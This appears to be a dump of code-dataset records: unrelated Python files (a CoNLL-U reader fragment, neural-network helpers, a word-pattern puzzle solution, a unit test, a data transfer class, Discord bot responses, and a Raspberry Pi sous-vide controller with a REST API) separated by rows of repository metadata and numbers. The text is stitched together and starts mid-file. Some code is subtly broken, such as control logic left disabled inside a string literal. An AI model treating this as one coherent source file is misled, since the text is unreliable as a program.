        filename = _file_name(source)
    document = Document(filename)
    # TODO: recognize and respect document boundaries in source data.
    for sentence in read_conllu(source, filename):
        document.append(sentence)
    yield document
def read_conllu(source, filename=None):
    """Read CoNLL-U format, yielding Sentence objects.
    Note: incomplete implementation, lacks validation."""
    # If given a string, assume it's a file name, open and recurse.
    if isinstance(source, basestring):
        with codecs.open(source, encoding='utf-8') as i:
            for s in read_conllu(i, filename=source):
                yield s
        return
    if filename is None:
        filename = _file_name(source)
    sent_num, offset = 1, 0
    current = Sentence(sent_num, filename, offset)
    for ln, line in enumerate(source):
        line = line.rstrip('\n')
        if not line:
            # A blank line terminates the current sentence.
            if not current.empty():
                # Assume single character sentence separator.
                offset += current.length() + 1
                yield current
            else:
                raise FormatError('empty sentence', line, ln+1)
            sent_num += 1
            current = Sentence(sent_num, filename, offset)
        elif line[0] == '#':
            # Comment lines attach to the upcoming sentence.
            current.comments.append(line)
        else:
            try:
                current.append(Element.from_string(line))
            except FormatError, e:  # Python 2 except syntax; tags error with line number
                e.linenum = ln+1
                raise e
    # Input must end with a blank line after the last sentence.
    assert current.empty(), 'missing terminating whitespace'
| 34.082251 | 108 | 0.563699 | 1,953 | 15,746 | 4.420379 | 0.154634 | 0.015985 | 0.019113 | 0.015638 | 0.222402 | 0.147573 | 0.118499 | 0.09788 | 0.062319 | 0.056064 | 0 | 0.004607 | 0.32459 | 15,746 | 461 | 109 | 34.156182 | 0.807146 | 0.093802 | 0 | 0.227273 | 0 | 0 | 0.041827 | 0 | 0 | 0 | 0 | 0.004338 | 0.015152 | 0 | null | null | 0.00303 | 0.012121 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95b5edc6b1bc1ba2f265a5431c58400fcfe3d0c9 | 433 | py | Python | torch_inception_resnet_v2/utils/functions.py | mhconradt/inception-resnet-v2 | 0816e9885eb7034d99a67519efa0642578526a3e | [
"MIT"
] | 9 | 2019-11-28T01:33:43.000Z | 2021-09-06T06:51:47.000Z | torch_inception_resnet_v2/utils/functions.py | mhconradt/inception-resnet-v2 | 0816e9885eb7034d99a67519efa0642578526a3e | [
"MIT"
] | 1 | 2022-02-06T12:03:00.000Z | 2022-02-07T02:30:47.000Z | torch_inception_resnet_v2/utils/functions.py | mhconradt/inception-resnet-v2 | 0816e9885eb7034d99a67519efa0642578526a3e | [
"MIT"
] | 4 | 2019-12-12T05:35:28.000Z | 2021-04-30T18:41:41.000Z | from .convolution_config import PadConfig
def find_first_before(filter_fn, arr, idx):
    """Return the last element of arr[:idx] satisfying filter_fn, or None."""
    candidates = (item for item in reversed(arr[:idx]) if filter_fn(item))
    return next(candidates, None)
def parallel_shifted_map(fn, start):
    """Build a mapper that applies fn(item, prev) over a sequence, where prev
    is the nearest preceding non-PadConfig item (or `start` for the first)."""
    def is_real(node):
        return not isinstance(node, PadConfig)

    def runner(items):
        out = []
        for i, item in enumerate(items):
            prev = find_first_before(is_real, items, i) if i else start
            out.append(fn(item, prev))
        return out
    return runner
| 27.0625 | 114 | 0.688222 | 66 | 433 | 4.19697 | 0.515152 | 0.086643 | 0.108303 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002941 | 0.214781 | 433 | 15 | 115 | 28.866667 | 0.811765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.1 | 0.1 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95b62dd7f2dbd4887491c9b50af2e6cd9f6d4a94 | 1,271 | py | Python | wordPattern2.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | wordPattern2.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | wordPattern2.py | pflun/learningAlgorithms | 3101e989488dfc8a56f1bf256a1c03a837fe7d97 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# pattern = "abab", str = "redblueredblue" should return true.
# pattern = "aaaa", str = "asdasdasdasd" should return true.
# pattern = "aabb", str = "xyzabcxzyabc" should return false.
class Solution(object):
    """Word Pattern II: decide whether `str` can be segmented into words so
    that it follows `pattern` under a bijective letter->word mapping.

    Fix over the original: the mapping is now enforced to be one-to-one
    (two different pattern letters may not map to the same word), per the
    problem's bijection requirement -- e.g. pattern "ab" no longer matches
    string "xx".
    """

    def wordPatternMatch(self, pattern, str):
        """Return True if str matches pattern, else False."""
        dic = {}
        return self.isMatch(str, 0, pattern, 0, dic)

    def isMatch(self, str, i, pat, j, dic):
        """Backtracking matcher for str[i:] against pat[j:] given mapping dic."""
        # Success only when both the string and the pattern are exhausted.
        if i == len(str) and j == len(pat):
            return True
        # One exhausted before the other: dead end.
        if i == len(str) or j == len(pat):
            return False
        if pat[j] in dic:
            curr = dic[pat[j]]
            # This letter is already bound; the remaining string must start
            # with its word, otherwise this branch fails.
            if not str.startswith(curr, i):
                return False
            return self.isMatch(str, i + len(curr), pat, j + 1, dic)
        # New pattern letter: try every candidate word, backtracking.
        used = set(dic.values())  # enforce bijection: no word bound twice
        for k in range(i, len(str)):
            candidate = str[i:k + 1]
            if candidate in used:
                continue
            dic[pat[j]] = candidate
            if self.isMatch(str, k + 1, pat, j + 1, dic):
                return True
            dic.pop(pat[j])
        return False
# Quick smoke check when the module is executed directly.
# print() with a single argument behaves identically under Python 2 and 3,
# replacing the Python-2-only `print expr` statement.
test = Solution()
print(test.wordPatternMatch("aabb", "11112222"))
95b9aa4be2c76aa96890942d69a75a3f195bba22 | 685 | py | Python | lecture09/colors_test.py | nd-cse-30872-fa20/cse-30872-fa20-examples | 7a991a0499e03bf91ac8ba40c99245d5d926e20c | [
"MIT"
] | 1 | 2021-09-07T19:02:43.000Z | 2021-09-07T19:02:43.000Z | lecture09/colors_test.py | nd-cse-30872-fa21/cse-30872-fa21-examples | c3287ac8b49a0de3c9770aadfb77be9080b19277 | [
"MIT"
] | null | null | null | lecture09/colors_test.py | nd-cse-30872-fa21/cse-30872-fa21-examples | c3287ac8b49a0de3c9770aadfb77be9080b19277 | [
"MIT"
] | 6 | 2021-08-25T15:59:08.000Z | 2021-11-12T16:32:11.000Z | #!/usr/bin/env python3
import unittest
import colors
# Test Case
class ColorsTestCase(unittest.TestCase):
    """Round-trip tests for the colors module helpers."""

    def test_00_count_colors(self):
        # (input sequence, expected per-color counts)
        cases = [
            ([0, 1, 2], [1, 1, 1]),
            ([0, 1, 2, 0, 1, 1], [2, 3, 1]),
        ]
        for sequence, expected in cases:
            self.assertEqual(colors.count_colors(sequence), expected)

    def test_01_expand_counts(self):
        # (input counts, expected expanded sorted sequence)
        cases = [
            ([1, 1, 1], [0, 1, 2]),
            ([2, 3, 1], [0, 0, 1, 1, 1, 2]),
        ]
        for counts, expected in cases:
            self.assertEqual(colors.expand_counts(counts), expected)
# Main execution: run the unittest command-line runner when invoked directly.
if __name__ == '__main__':
    unittest.main()
| 19.571429 | 53 | 0.506569 | 83 | 685 | 3.963855 | 0.337349 | 0.042553 | 0.255319 | 0.151976 | 0.413374 | 0.212766 | 0.212766 | 0.212766 | 0 | 0 | 0 | 0.079909 | 0.360584 | 685 | 34 | 54 | 20.147059 | 0.671233 | 0.067153 | 0 | 0.173913 | 0 | 0 | 0.012579 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 1 | 0.086957 | false | 0 | 0.086957 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95c4d8a91ee8d4d10ff12366fd9c233f02647267 | 5,210 | py | Python | src/kemokrw/transfer_basic.py | Kemok-Repos/kemokrw | bfe2a82e2ef5d3580ed5dfe65129b30bd3fc4971 | [
"MIT"
] | null | null | null | src/kemokrw/transfer_basic.py | Kemok-Repos/kemokrw | bfe2a82e2ef5d3580ed5dfe65129b30bd3fc4971 | [
"MIT"
] | null | null | null | src/kemokrw/transfer_basic.py | Kemok-Repos/kemokrw | bfe2a82e2ef5d3580ed5dfe65129b30bd3fc4971 | [
"MIT"
] | null | null | null | from kemokrw.transfer import Transfer
class BasicTransfer(Transfer):
"""Clase BasicTransfer implementación de la clase Transfer.
Cumple la función de verficar la compatibilidad de los objetos a transferir,
verifica si ambos extremos son "iguales" y transfiere un los atos de una fuente a la otra.
Atributos
---------
src : pandas.DataFrame Object
dst : pandas.DataFrame Object
max_transfer : int
Métodos
-------
verify():
Verifica si la fuente y el destino son compatibles.
Verifica si el destino es igual a la fuente.
transfer(retires=0):
Tranfiere los datos de la fuente a el destino.
"""
def __init__(self, src=None, dst=None, max_transfer=0):
""" Contruye los atributos necesarios para hacer una transferencia y verifica la compatibilidad de las fuentes.
Parametros
----------
src : pandas.DataFrame Object
Objeto origen resultante de una implementación de la clase Extract.
dst : pandas.DataFrame Object
Objeto destino resultante de una implementación de la clase Load.
max_transfer : int
Máxima cantidad de filas a transferir bajo este método.
Raises
------
Exception
No compatibility found.
"""
self.src = src
self.dst = dst
self.verification = None
self.max_transfer = max_transfer
def verify(self):
"""Verifica la compatibilidad de los objetos a transferir y verifica si el destino es igual a la fuente.
Este metodo utiliza el atributo metadata y la función get_metada() de los objetos src y dst. (Ver documentación)
1. Verifica la compatibilidad del modelo de ambos objetos bajo las siguientes reglas:
- La metadata tiene el mismo número de columnas (metadata[ncols])
- Las columnas de metadata tienen el mismo tipo respectivamente (metadata[columns][colX][type]
2. Verifica si la metadata es igual entre los objetos src y dst para aquellos "keys" de chequeo que se
encuentran en la metadata de ambas objetos.
Raises
------
Exception
No compatibility found.
"""
self.dst.get_metadata() # Actualiza la metadata del objeto destino
# Revisa que la cantidad de columnas sea igual
if self.src.metadata["ncols"] != self.dst.metadata["ncols"]:
raise Exception('No compatibility found. Different number of columns detected')
# Revisa que cada tipo de columna sea igual entre pares
for i in self.src.metadata["columns"]:
if self.src.metadata["columns"][i]["type"] != self.dst.metadata["columns"][i]["type"]:
raise Exception('No compatibility found. {2} "{0}" type do not match "{1}".'.format(
self.src.metadata["columns"][i]["type"], self.dst.metadata["columns"][i]["type"], i))
verification = True
# Revisa el número de filas en cada extremo
if self.src.metadata["check_rows"] != self.dst.metadata["check_rows"]:
verification = False
# Revisa que cada pareja de columnas para revisar los chequeos
if verification:
for i in self.src.metadata["columns"]:
common_params = set(self.src.metadata["columns"][i].keys()) & set(self.dst.metadata["columns"][i].keys())
common_params.discard("subtype")
for j in common_params:
if self.src.metadata["columns"][i][j] != self.dst.metadata["columns"][i][j]:
m = 'La columna {0} no hace match en la verificacion de {1}. {2} != {3}'
print(m.format(i, j, str(self.src.metadata["columns"][i][j])
, str(self.dst.metadata["columns"][i][j])))
verification = False
self.verification = verification
return verification
def transfer(self, retries=0):
"""Tranfiere y verifica los datos del origen al destino.
Este método realiza una verificación de los datos en ambos extremos y si no son iguales intenta transferir
los datos.
Parametros
----------
retries : int
Número de intentos adicionales en caso la verificación falle la primera vez
Raises
------
Exception
Verification failed after transfer.
"""
self.verify()
if not self.verification and self.src.data.empty:
self.src.get_data()
total_tries = 1+retries
n_try = 1
while n_try <= total_tries and not self.verification:
if n_try > 1:
print("Transferring data. Try {0} out of {1}".format(n_try, total_tries))
self.dst.save_data(self.src.data)
self.verify()
n_try += 1
if self.verification:
print('Transfer successful.')
else:
print(self.src.metadata)
print(self.dst.metadata)
raise Exception('Verification failed after transfer. Transfer tried {} times'.format(total_tries))
| 39.469697 | 121 | 0.604798 | 636 | 5,210 | 4.91195 | 0.284591 | 0.033611 | 0.048015 | 0.049296 | 0.254161 | 0.181178 | 0.1242 | 0.056978 | 0.056978 | 0.034571 | 0 | 0.004961 | 0.303647 | 5,210 | 131 | 122 | 39.770992 | 0.856119 | 0.439347 | 0 | 0.125 | 0 | 0.020833 | 0.171574 | 0 | 0 | 0 | 0 | 0.030534 | 0 | 1 | 0.0625 | false | 0 | 0.020833 | 0 | 0.125 | 0.104167 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95c5f43dbbc13e192693feee3122038d4c144608 | 2,190 | py | Python | responses/test.py | YousefEZ/pydiscord | 56e8715447548ac983c5417a908c8e5ce24c119e | [
"MIT"
] | 3 | 2022-02-20T21:54:31.000Z | 2022-02-20T21:56:30.000Z | responses/test.py | YousefEZ/pydiscord | 56e8715447548ac983c5417a908c8e5ce24c119e | [
"MIT"
] | null | null | null | responses/test.py | YousefEZ/pydiscord | 56e8715447548ac983c5417a908c8e5ce24c119e | [
"MIT"
] | 1 | 2021-03-18T01:01:28.000Z | 2021-03-18T01:01:28.000Z | import sys, inspect
class Tutorial:
    """Response definition for the TUTORIAL flow, rendered as an embed.

    Class attributes identify the flow; instance attributes hold the
    embed payload (fields, footer, thumbnail, image).
    """
    flow = "TUTORIAL"
    type = "embed"
    title = "__TUTORIAL HELP__"
    colour = "green"

    def __init__(self, player=None):
        # NOTE(review): the outer parentheses make this a single 3-tuple
        # (title, body, inline-flag), not a tuple of field tuples -- confirm
        # the embed renderer expects this shape.
        self.fields = (('Official Discord Server:',
                        '''
https://discord.com/invite/discord-developers
**-**`tutorial`: :mortar_board: A simple tutorial for how the bot works.
''', False))
        self.footer_text = "\u00A9 2018 | Bot"
        self.footer_icon = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
        self.thumbnail = ""
        self.image = ""

    pointer = None  # no next page for this flow
class P1:
    """Page 'p1' of the tutorial flow (a menu; linked to from P2)."""
    flow = "p1"
    type = "menu"
    title = "Tutorial HELP CONT.__"
    colour = "blue"

    def __init__(self, player=None):
        # NOTE(review): outer parentheses yield a single 2-tuple, not a
        # tuple of field tuples -- confirm against the renderer.
        self.fields = (("https://discord.com/invite/discord-developers",
                        """
https://discord.com/invite/discord-developers """))
        self.footer_text = "\u00A9 2018 | Bot"
        self.footer_icon = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
        self.thumbnail = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
        self.image = ""

    pointer = None  # end of the page chain
class P2:
    """Page 'p2' of the tutorial flow; its pointer chains to P1."""
    flow = "p2"
    type = " main menu"
    title = "__Tutorial HELP__"
    colour = "blue"

    def __init__(self, player=None):
        # NOTE(review): outer parentheses yield a single 2-tuple, not a
        # tuple of field tuples -- confirm against the renderer.
        self.fields = (("Official Discord Server:",
                        """
https://discord.com/invite/discord-developers
"""))
        self.footer_text = "\u00A9 2018 | Bot"
        self.footer_icon = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
        self.thumbnail = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"
        self.image = "https://1000logos.net/wp-content/uploads/2020/10/Discord-emblem.jpg"

    pointer = P1  # next page in the flow
# Automatically reads and assigns flows: every module-level object that
# exposes a `flow` attribute is registered under that name; members without
# one (modules, builtins, functions) raise AttributeError and are skipped.
flows = {}
for a, obj in inspect.getmembers(sys.modules[__name__]):
    try:
        flows[obj.flow] = obj
    except AttributeError:
        pass
| 32.686567 | 97 | 0.559361 | 235 | 2,190 | 5.07234 | 0.306383 | 0.050336 | 0.08557 | 0.095638 | 0.717282 | 0.682886 | 0.651007 | 0.651007 | 0.651007 | 0.608221 | 0 | 0.056728 | 0.307763 | 2,190 | 66 | 98 | 33.181818 | 0.729551 | 0.017352 | 0 | 0.413043 | 0 | 0.130435 | 0.380083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065217 | false | 0.021739 | 0.021739 | 0 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
95d6e74ba0cd34cbb9d1e330c81e5f38b7df9b5b | 12,124 | py | Python | sousvide.py | jscuffell/sous-vide | 8de1cb95776ccb20ac9bac953c5f226d0d5f28fa | [
"MIT"
] | null | null | null | sousvide.py | jscuffell/sous-vide | 8de1cb95776ccb20ac9bac953c5f226d0d5f28fa | [
"MIT"
] | null | null | null | sousvide.py | jscuffell/sous-vide | 8de1cb95776ccb20ac9bac953c5f226d0d5f28fa | [
"MIT"
] | null | null | null | import os
import glob
import time
from bottle import Bottle, run, request, response, post, get
import re, json
import RPi.GPIO as GPIO
from lcdtools import LCDDisplay
#import Adafruit_CharLCD as LCD
import threading
import collections
# This script defines the sous vide class, which can interact with the REST API.
class TemperatureSensor:
# Define each temperature sensor in an object. The thermometer deals with all of them at once.
def __init__(self, device_address):
print "Address is " + device_address
os.system('modprobe w1-gpio')
os.system('modprobe w1-therm')
self.base_dir = '/sys/bus/w1/devices/'
self.device_folder = self.base_dir + device_address
self.device_file = self.device_folder + '/w1_slave'
self.device_address = device_address
def __read_temp_raw(self):
f = open(self.device_file, 'r')
lines = f.readlines()
f.close()
return lines
def __read_temp(self):
lines = self.__read_temp_raw()
while lines[0].strip()[-3:] != 'YES':
time.sleep(0.2)
lines = self.__read_temp_raw()
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
temp_c = float(temp_string) / 1000.0
temp_f = temp_c * 9.0 / 5.0 + 32.0
return round(temp_c, 1)
def getTemperature(self):
return self.__read_temp()
class Thermometer:
    """Aggregates readings from a set of TemperatureSensor instances.

    Improvements over the original: no mutable default argument, and
    getSensorByIndex materializes keys() so it also works on Python 3.
    """
    def __init__(self, sensor_addresses=None):
        # None default instead of a shared mutable [] (original pitfall).
        self.sensors = {}
        for address in (sensor_addresses or []):
            self.addSensor(address)

    def addSensor(self, device_address):
        """Register a new sensor by its 1-wire device address."""
        self.sensors[device_address] = TemperatureSensor(device_address)

    def getSensors(self):
        """Return the address -> sensor mapping."""
        return self.sensors

    def getSensorByIndex(self, index):
        """Return the sensor at positional index over the key order.

        NOTE: plain dict key order is arbitrary on Python 2 -- the index is
        positional over whatever order keys() yields."""
        index = int(index)
        return self.sensors[list(self.sensors.keys())[index]]

    def getTemperature(self, withSummary=0):
        """Return {address: temperature}; when withSummary > 0, add a
        'summary' entry with mean/min/max/range over all sensors.

        Raises ZeroDivisionError if a summary is requested with no sensors
        (unchanged from the original)."""
        readings = {}
        for address in self.sensors.keys():
            readings[address] = self.sensors[address].getTemperature()
        if withSummary > 0:
            values = list(readings.values())
            summary = {}
            summary['mean'] = sum(values) / len(values)
            summary['min'] = min(values)
            summary['max'] = max(values)
            summary['range'] = summary['max'] - summary['min']
            readings['summary'] = summary
        return readings

    def getAverageTemperature(self):
        """Return the mean temperature across all sensors."""
        return self.getTemperature(1)['summary']['mean']
class Thermostat:
    """Holds a target temperature and runs a daemon control thread.

    The thread reads the module-level `thermometer` and drives the
    module-level `heater` towards the target once per second.
    """
    def __init__(self):
        # Start thermostat at a default temperature. Say - 10 degrees celsius.
        self.thermTemp = float(10)
        # Daemon thread dies with the main process.
        therm = threading.Thread(target=self.thermostatAdjust)
        therm.daemon=True
        therm.start()

    def setThermostat(self, temp):
        """Set the target temperature (Celsius); values above 90 are refused."""
        if (temp > 90):
            print "High temperature set and that is not allowed"
            raise ValueError
        self.thermTemp = float(temp)
        # This is picked up by the thermostatAdjust function
        return self.thermTemp

    def getThermostat(self):
        """Return the current target temperature."""
        return self.thermTemp

    def thermostatAdjust(self):
        """Control loop: forever compare mean temperature to the target and
        switch the heater; the big triple-quoted block below is disabled
        rate-of-change logic kept for reference."""
        global thermometer
        global heater
        # Rolling window of the last 3 [timestamp, temperature] samples
        # (only used by the disabled logic below).
        tempReadings = collections.deque([], 3)
        j = 1 # this is so we don't do anything for the first 3 iterations, so that my collection can fill up
        while 1==1:
            readings = thermometer.getTemperature(1) # with summary
            thermostat = self.getThermostat()
            currentTemp = readings['summary']['mean']
            tempReadings.append([int(time.time()), currentTemp])
            # delta > 0 means we are above target; delta < 0 means below.
            delta = currentTemp - thermostat
            print str(delta) + "is delta"
            ''' if j > 3: # as long as we are three seconds into this
            # We will implement a 15 second rule. If, at the current rate, we will reach our temperature in 8 seconds, then slow it down.
            print json.dumps(list(tempReadings))
            dy_dx = (tempReadings[2][1] - tempReadings[0][1])/(tempReadings[2][0]-tempReadings[0][0])
            print "DY_DX = " + str(dy_dx)
            if ((currentTemp + 15*dy_dx ) > thermostat): # if we will overshoot thermostatic temperature in the next 15 secnods at this rate:
            print "Slowing things down"
            # Equally, if the temperature is still less than 2 degrees from correct, then dnon't just turn the bloody thing off
            if (delta < -2):
            heater.setPower(heater.getPower()-1)
            elif (delta > -2) and (delta < -0.7):
            heater.setPower(1)
            else:
            heater.setPower(0)
            else:
            delta = currentTemp - thermostat
            if (dy_dx < -0.005): # if the temperature is coming down rather than up
            if (delta < -5):
            heater.setPower(3)
            elif (delta < -2):
            heater.setPower(2)
            elif (delta < -0.5 ):
            heater.setPower(2)
            elif (delta > -0.5):
            heater.setPower(0)
            else:
            if (delta < -5):
            heater.setPower(3)
            elif (delta < -2):
            heater.setPower(2)
            elif (delta <= -0.5 ):
            heater.setPower(1)
            elif (delta > -0.5):
            heater.setPower(0)
            else:
            j = j+1
            if (delta < 0):
            heater.setPower(3)
            else:
            heater.setPower(0)
            # As we approach the right temperature, start to pulse the element, so it is on less frequently
            # if (delta < -5):
            # heater.on()
            # elif (delta < -2):
            # heater.pulse(2,1)
            # elif (delta < -0.5):
            # heater.pulse(1,2)
            # elif (delta < 0):
            # heater.off()
            # elif abs(delta) <= 0.5:
            # heater.off()
            # else:
            # heater.off() '''
            print "Heater state is " + str(heater.getState())
            # let's do this a little simpler.
            # Live logic: bang-bang control with a +/-0.5 degree band.
            if (delta > 0.5) and (heater.getState() == 1):
                heater.setPower(0)
            elif (delta < -0.5) and (heater.getState() == 0):
                heater.setPower(3)
            time.sleep(1)
        return
class GPIOTools:
    """Initializes RPi.GPIO (BCM numbering) and provides a switch wrapper."""

    def __init__(self):
        GPIO.setmode(GPIO.BCM)
        GPIO.setwarnings(False)

    class GPIOSwitch:
        """A single GPIO output pin treated as an on/off switch.

        inv=1 inverts the output level (for active-low relay boards).
        """
        def __init__(self, GPIOPin, inv=0):
            self.pin = GPIOPin
            GPIO.setup(self.pin, GPIO.OUT)
            self.inv = inv
            self.off()  # Always start as off

        def on(self):
            """Drive the pin to its 'on' level and record state 1."""
            if self.inv == 0:
                GPIO.output(self.pin, GPIO.HIGH)
            else:
                GPIO.output(self.pin, GPIO.LOW)
            self.state = 1
            return self.state

        def off(self):
            """Drive the pin to its 'off' level and record state 0."""
            if self.inv == 0:
                GPIO.output(self.pin, GPIO.LOW)
            else:
                GPIO.output(self.pin, GPIO.HIGH)
            self.state = 0
            return self.state

        def getState(self):
            """Return 1 if on, 0 if off."""
            return self.state

        def setState(self, newState):
            """Switch on when newState == 1, otherwise off."""
            if (newState == 1):
                self.on()
            else:
                self.off()
            return self.state

        def toggle(self):
            """Flip the switch state.

            BUG FIX: the original computed `self.state - 1 % 2`, which is
            `self.state - 1` because % binds tighter than -, so toggling an
            "off" switch called setState(-1) and left it off."""
            self.setState((self.state + 1) % 2)
def LCDDaemon(lcd):
    """Forever loop for a daemon thread: log the readings and refresh the
    LCD once per second.

    Relies on the module-level `thermometer` and `thermostat` objects.
    NOTE: the module later rebinds the name LCDDaemon to the Thread object
    that runs this function."""
    i = 0
    while 1==1:
        print str(i) +","+json.dumps(thermometer.getTemperature(1))
        lcd.setMessage("Temp " + str(thermometer.getAverageTemperature()) + " C" + "\nThermostat " + str(int(thermostat.getThermostat())) + " C")
        time.sleep(1)
        i = i+1
    return
class Heater:
    """Controls one or more relays driving heating elements.

    Power levels: 0 off, 1 light pulse (1s on / 2s off), 2 heavy pulse
    (2s on / 1s off), 3 continuously on.

    Fixes over the original: toggle() had a precedence bug
    (`self.state - 1 % 2` == `self.state - 1`), and the constructor used a
    mutable [] default argument.
    """
    def __init__(self, gpioPorts=None):
        self.gpio = GPIOTools()
        self.relays = []
        self.state = 0
        for port in (gpioPorts or []):
            self.addRelay(port)
        self.__off()
        self.power = 0

    def addRelay(self, gpioPort):
        """Attach a relay switch on the given BCM GPIO port."""
        self.relays.append(self.gpio.GPIOSwitch(gpioPort))

    def __on(self):
        # Switch every relay on and record the aggregate state.
        for relay in self.relays:
            relay.on()
        self.state = 1

    def __off(self):
        for relay in self.relays:
            relay.off()
        self.state = 0

    def setState(self, state):
        """Force all relays to the given 0/1 state."""
        for relay in self.relays:
            relay.setState(state)
        self.state = state

    def toggle(self):
        """Flip all relays and the recorded state (precedence bug fixed)."""
        for relay in self.relays:
            relay.toggle()
        self.state = (self.state + 1) % 2

    def getState(self):
        """Return 1 if the heater is currently on, 0 otherwise."""
        return self.state

    def setPower(self, power):
        """Set the power level, clamped to [0, 3], and drive the relays."""
        power = max(0, min(3, power))
        self.power = power
        if power == 3:
            self.__on()
        elif power == 2:
            self.pulse(2, 1)  # heavy pulse
        elif power == 1:
            self.pulse(1, 2)  # light pulse
        else:
            self.__off()
        return

    def getPower(self):
        """Return the last requested (clamped) power level."""
        return self.power

    def pulse(self, time_on, time_off):
        """Switch on for time_on seconds, then off for time_off seconds."""
        self.__on()
        time.sleep(time_on)
        self.__off()
        time.sleep(time_off)
        return self.state
# --- Hardware setup ---------------------------------------------------------
heater = Heater([18])  # Put each of the GPIO pins you need in here
thermometer = Thermometer(['28-051685065aff'])
#thermometer = Thermometer(['28-051685065aff', '28-0416847451ff'])
thermostat = Thermostat()
lcd = LCDDisplay()
gpio = GPIOTools()
pumprelay = gpio.GPIOSwitch(19)  # for gpio pin 19 being used.
# use pumprelay.on() / pumprelay.off() / pumprelay.getState()
# use pumprelay.setState(0) for off, pumprelay.setState(1) for on

# Run the LCD updater in a background daemon thread.  Fix: the original
# rebound the name LCDDaemon to the Thread object, shadowing the LCDDaemon
# function itself; use a distinct variable name instead.
lcd_thread = threading.Thread(target=LCDDaemon, args=(lcd,))
lcd_thread.daemon = True
lcd_thread.start()

# Do the REST API bit
app = Bottle()
@app.route('/hello')
def hello():
    # Simple liveness-check endpoint.
    return "Hello World"
@app.get('/temperature')
def getState():
    """GET /temperature -- average temperature across all sensors, as JSON."""
    payload = {'temp': thermometer.getAverageTemperature()}
    response.headers['Content-Type'] = 'application/json'
    return json.dumps(payload)
@app.get('/temperature/<sensor>')
def getStateBySensor(sensor=0):
    """GET /temperature/<sensor> -- temperature of one sensor, by index.

    NOTE(review): Bottle delivers <sensor> as a string; getSensorByIndex
    presumably expects an index -- confirm whether int(sensor) is needed.
    """
    response.headers['Content-Type'] = 'application/json'
    selected = thermometer.getSensorByIndex(sensor)
    # Fix: the original also called thermometer.getTemperature() here and
    # discarded the result; that redundant read has been removed.
    return json.dumps({'temp': selected.getTemperature()})
@app.get('/thermostat')
def getThermostat():
    """GET /thermostat -- current thermostat set point, as JSON."""
    current = thermostat.getThermostat()
    response.headers['Content-Type'] = 'application/json'
    return json.dumps({'state': current})
@app.post('/thermostat')
def setThermostat():
    """POST /thermostat -- set the thermostat target from the request body.

    The body must be a plain number.  Responds 400 on a malformed body or
    on a value rejected by Thermostat.setThermostat; otherwise returns the
    new set point as JSON.
    """
    try:
        # Fix: float() can raise ValueError on a malformed body.  Keep it
        # inside the try so bad input yields a 400 instead of an unhandled
        # exception (HTTP 500).  The debug print of the raw value was removed.
        new_temp = float(request.body.read())
        thermostat.setThermostat(new_temp)
    except ValueError:
        response.status = 400
        return
    response.headers['Content-Type'] = 'application/json'
    return json.dumps({'state': thermostat.getThermostat()})
@app.get('/heater')
def getHeater():
    """GET /heater -- the heater's current on/off state, as JSON."""
    state = heater.getState()
    response.headers['Content-Type'] = 'application/json'
    return json.dumps({'state': state})
@app.post('/heater')
def changeHeater():
    """POST /heater -- force the heater off (0) or on (1) from the body.

    Responds 400 on a malformed body or an out-of-range value; otherwise
    applies the state and returns it as JSON.
    """
    try:
        # Fix: int() can raise ValueError on a malformed body -- keep it
        # inside the try so bad input yields a 400 instead of a 500.  The
        # original also used bitwise `|` for a boolean-or and raised a
        # ValueError only to catch it on the next line; a simple membership
        # test is clearer.  The debug print was removed.
        new_state = int(request.body.read())
        if new_state not in (0, 1):
            raise ValueError
    except ValueError:
        response.status = 400
        return
    heater.setState(new_state)
    response.headers['Content-Type'] = 'application/json'
    return json.dumps({'state': heater.getState()})
# Serve the API on the LAN; host and port are hardcoded for this deployment.
run(app, host='192.168.0.37', port=8080)
